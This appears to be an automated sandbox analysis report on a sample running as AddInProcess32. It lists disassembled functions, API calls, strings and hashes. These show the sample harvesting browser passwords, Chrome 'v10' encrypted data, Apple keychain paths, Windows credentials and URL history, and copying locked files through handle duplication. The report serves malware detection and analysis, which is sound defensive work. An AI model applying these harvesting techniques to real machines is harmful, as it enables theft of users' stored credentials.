                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                            • memset.MSVCRT ref: 00445B52
                                            • memset.MSVCRT ref: 00445B6A
                                            • memset.MSVCRT ref: 00445C9B
                                            • memset.MSVCRT ref: 00445CB3
                                            • _wcsicmp.MSVCRT ref: 00445D56
                                            • memset.MSVCRT ref: 00445B82
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                            • memset.MSVCRT ref: 00445986
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                            • API String ID: 2263259095-3798722523
                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                            • String ID: $/deleteregkey$/savelangfile
                                            • API String ID: 2744995895-28296030
                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 0040B71C
                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                            • wcsrchr.MSVCRT ref: 0040B738
                                            • memset.MSVCRT ref: 0040B756
                                            • memset.MSVCRT ref: 0040B7F5
                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                            • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                            • memset.MSVCRT ref: 0040B851
                                            • memset.MSVCRT ref: 0040B8CA
                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                            • memset.MSVCRT ref: 0040BB53
                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                            • String ID: chp$v10
                                            • API String ID: 4165125987-2783969131
                                            • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                            • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 512 40e304-40e316 call 406e8f 510->512 516 40e476-40e483 call 406b53 512->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->512 524->509 530 40e497-40e49f free 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 555 40e3c3-40e3c6 550->555 551->552 553 40e416-40e427 memcpy 552->553 554 40e42a-40e42f 552->554 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                            APIs
                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                            • free.MSVCRT ref: 0040E49A
                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                            • memset.MSVCRT ref: 0040E380
                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                            • wcschr.MSVCRT ref: 0040E3B8
                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                            • API String ID: 3849927982-2252543386
                                            • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                            • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                                            APIs
                                            • memset.MSVCRT ref: 004091E2
                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                            • String ID:
                                            • API String ID: 3715365532-3916222277
                                            • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                            • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 free 643->646 648 413edb-413ee2 645->648 646->648 656 413ee4 648->656 657 413ee7-413efe 648->657 662 413ea2-413eae CloseHandle 650->662 654 413e61-413e68 651->654 655 413e37-413e44 GetModuleHandleW 651->655 654->650 660 413e6a-413e76 654->660 655->654 659 413e46-413e5c GetProcAddress 655->659 656->657 657->638 659->654 660->650 662->641
                                            APIs
                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                            • memset.MSVCRT ref: 00413D7F
                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                            • memset.MSVCRT ref: 00413E07
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                            • free.MSVCRT ref: 00413EC1
                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                            • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                            • API String ID: 1344430650-1740548384
                                            • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                            • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                              • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                            • String ID: bhv
                                            • API String ID: 4234240956-2689659898
                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                            • API String ID: 2941347001-70141382
                                            • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                            • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 701 44671d-446726 699->701 702 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->702 704 446747-44674b 701->704 705 446728-44672d 701->705 710 4467ac-4467b7 __setusermatherr 702->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 702->711 704->700 706 44674d-44674f 704->706 705->700 708 446734-44673b 705->708 709 446755-446758 706->709 708->700 712 44673d-446745 708->712 709->702 710->711 715 446810-446819 711->715 716 44681e-446825 711->716 712->709 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 722 446834-446838 718->722 723 44683a-44683e 718->723 720 446845-44684b 719->720 721 446872-446877 719->721 725 446853-446864 GetStartupInfoW 720->725 726 44684d-446851 720->726 721->719 722->718 722->723 723->720 727 446840-446842 723->727 729 446866-44686a 725->729 730 446879-44687b 725->730 726->725 726->727 727->720 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                            • String ID:
                                            • API String ID: 2827331108-0
                                            • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                            • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 0040C298
                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                            • wcschr.MSVCRT ref: 0040C324
                                            • wcschr.MSVCRT ref: 0040C344
                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                            • GetLastError.KERNEL32 ref: 0040C373
                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                            • String ID: visited:
                                            • API String ID: 1157525455-1702587658
                                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 free 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                                            APIs
                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                            • memset.MSVCRT ref: 0040E1BD
                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                            • free.MSVCRT ref: 0040E28B
                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                            • _snwprintf.MSVCRT ref: 0040E257
                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                            • API String ID: 2804212203-2982631422
                                            • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                            • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                            • memset.MSVCRT ref: 0040BC75
                                            • memset.MSVCRT ref: 0040BC8C
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                            • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
